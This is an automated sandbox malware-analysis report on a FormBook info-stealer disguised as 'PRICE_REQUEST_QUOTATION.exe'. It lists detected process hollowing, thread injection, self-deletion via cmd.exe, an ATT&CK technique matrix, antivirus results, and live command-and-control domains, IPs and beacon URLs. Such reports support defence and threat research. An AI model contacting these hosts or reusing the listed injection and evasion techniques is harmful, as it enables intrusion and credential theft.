Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h]	17_2_04C8D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h]	17_2_04C8D294
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]	17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]	17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]	17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]	17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]	17_2_04C552A5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD46A7 mov eax, dword ptr fs:[00000030h]	17_2_04CD46A7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]	17_2_04C6AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]	17_2_04C6AAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h]	17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h]	17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h]	17_2_04D20EA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8FAB0 mov eax, dword ptr fs:[00000030h]	17_2_04C8FAB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]	17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]	17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]	17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]	17_2_04C59240
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]	17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]	17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]	17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]	17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]	17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]	17_2_04C67E41
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CE4257 mov eax, dword ptr fs:[00000030h]	17_2_04CE4257
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6766D mov eax, dword ptr fs:[00000030h]	17_2_04C6766D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h]	17_2_04D0B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h]	17_2_04D0B260
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28A62 mov eax, dword ptr fs:[00000030h]	17_2_04D28A62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9927A mov eax, dword ptr fs:[00000030h]	17_2_04C9927A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]	17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]	17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]	17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]	17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]	17_2_04C7AE73
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]	17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]	17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]	17_2_04C5C600
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h]	17_2_04C8A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h]	17_2_04C8A61C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C73A1C mov eax, dword ptr fs:[00000030h]	17_2_04C73A1C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5E620 mov eax, dword ptr fs:[00000030h]	17_2_04C5E620
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0FE3F mov eax, dword ptr fs:[00000030h]	17_2_04D0FE3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C937F5 mov eax, dword ptr fs:[00000030h]	17_2_04C937F5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h]	17_2_04C61B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h]	17_2_04C61B8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0D380 mov ecx, dword ptr fs:[00000030h]	17_2_04D0D380
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8B390 mov eax, dword ptr fs:[00000030h]	17_2_04C8B390
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]	17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]	17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]	17_2_04CD7794
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D1138A mov eax, dword ptr fs:[00000030h]	17_2_04D1138A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D25BA5 mov eax, dword ptr fs:[00000030h]	17_2_04D25BA5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5DB40 mov eax, dword ptr fs:[00000030h]	17_2_04C5DB40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6EF40 mov eax, dword ptr fs:[00000030h]	17_2_04C6EF40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28B58 mov eax, dword ptr fs:[00000030h]	17_2_04D28B58
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5F358 mov eax, dword ptr fs:[00000030h]	17_2_04C5F358
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5DB60 mov ecx, dword ptr fs:[00000030h]	17_2_04C5DB60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6FF60 mov eax, dword ptr fs:[00000030h]	17_2_04C6FF60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h]	17_2_04C83B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h]	17_2_04C83B7A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28F6A mov eax, dword ptr fs:[00000030h]	17_2_04D28F6A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h]	17_2_04C8A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h]	17_2_04C8A70E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D1131B mov eax, dword ptr fs:[00000030h]	17_2_04D1131B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h]	17_2_04CEFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h]	17_2_04CEFF10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h]	17_2_04D2070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h]	17_2_04D2070D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h]	17_2_04C54F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h]	17_2_04C54F2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8E730 mov eax, dword ptr fs:[00000030h]	17_2_04C8E730

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 3_2_00409B50 LdrLoadDll,

3_2_00409B50

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe	Network Connect: 154.208.173.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe	Network Connect: 109.106.246.165 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe	Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe	Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe	Domain query: www.patrickandmaxine.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1060000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Memory written: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3472			Jump to behavior

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'			Jump to behavior

Source: explorer.exe, 00000006.00000000.281211852.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.311360069.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

0_2_0040312A

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Virtualization/Sandbox Evasion2	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection612	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing11	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PRICE_REQUEST_QUOTATION.exe	34%	Virustotal		Browse
PRICE_REQUEST_QUOTATION.exe	29%	ReversingLabs	Win32.Trojan.Nsisx
PRICE_REQUEST_QUOTATION.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll	13%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
17.2.wscript.exe.c28870.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.2.wscript.exe.516796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

Source	Detection	Scanner	Label	Link
nailsestetic.space	2%	Virustotal		Browse
www.futurodr.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc	100%	Avira URL Cloud	malware
http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe
http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe
www.nudesalon.digital/rgoe/	0%	Avira URL Cloud	safe
http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe
http://survey-smiles.com	0%	Avira URL Cloud	safe
http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nailsestetic.space	109.106.246.165	true	true	2%, Virustotal, Browse	unknown
www.futurodr.com	154.208.173.139	true	true	0%, Virustotal, Browse	unknown
www.babeshotnud.com	185.107.56.60	true	true		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false		unknown
parkingpage.namecheap.com	198.54.117.212	true	false		high
teelandcompany.com	34.102.136.180	true	false		unknown
www.thenewtocsin.com	unknown	unknown	true		unknown
www.4-6-2.com	unknown	unknown	true		unknown
www.snackithalal.com	unknown	unknown	true		unknown
www.nailsestetic.space	unknown	unknown	true		unknown
www.appleluis.host	unknown	unknown	true		unknown
www.teelandcompany.com	unknown	unknown	true		unknown
www.patrickandmaxine.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc	true	Avira URL Cloud: malware	unknown
http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc	true	Avira URL Cloud: safe	unknown
http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc	true	Avira URL Cloud: safe	unknown
www.nudesalon.digital/rgoe/	true	Avira URL Cloud: safe	low
http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc	false	Avira URL Cloud: safe	unknown
http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	PRICE_REQUEST_QUOTATION.exe	false		high
https://bitninja.io	wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	PRICE_REQUEST_QUOTATION.exe	false		high
http://survey-smiles.com	wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false
154.208.173.139	www.futurodr.com	Seychelles	40065	CNSERVERSUS	true
185.107.56.60	www.babeshotnud.com	Netherlands	43350	NFORCENL	true
34.102.136.180	teelandcompany.com	United States	15169	GOOGLEUS	false
109.106.246.165	nailsestetic.space	Serbia	199493	NETNET-ASRS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491948
Start date:	28.09.2021
Start time:	08:02:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PRICE_REQUEST_QUOTATION.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/2@9/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.1% (good quality ratio 15.9%) Quality average: 51.6% Quality standard deviation: 43%
HCA Information:	Successful, ratio: 83% Number of executed functions: 99 Number of non-executed functions: 47
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.209.183, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.107.56.60	gRd8HGFpL7.exe	Get hash	malicious	Browse	www.pxwuo.com/kgw/?8pBp5p=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN0BUW6oeKdMTmJKWlw==&LXPL=yvqlQXkhnxmxPrbP
	5j6RsnL8zx.exe	Get hash	malicious	Browse	www.tomatrader.com/8rg4/?Txlp=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV&OHX=JRmh
